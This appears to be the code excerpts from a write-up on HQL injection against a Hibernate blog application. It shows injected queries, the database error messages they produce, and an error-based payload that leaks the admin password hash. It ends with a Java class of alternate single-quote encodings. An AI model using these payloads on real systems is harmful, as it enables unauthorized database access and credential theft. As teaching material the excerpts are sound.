from BlogPosts
where title like '%'
and DOESNT_EXIST=1 and ''='%'--
and published = true
org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement:
select as id21_, as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159]
1.from BlogPosts
where title like '%11'
and (select password from User where username='admin')=1
or ''='%'
and published = true
2.Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement:
select as id18_, as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1
public class Constants {
public static final String S_QUOTE = "'";
public static final String HQL_PART = "select * from Post where name = '";
public static final char C_QUOTE_1 = '\'';
public static final char C_QUOTE_2 = '\047';
public static final char C_QUOTE_3 = 39;
public static final char C_QUOTE_4 = 0x27;
public static final char C_QUOTE_5 = 047;}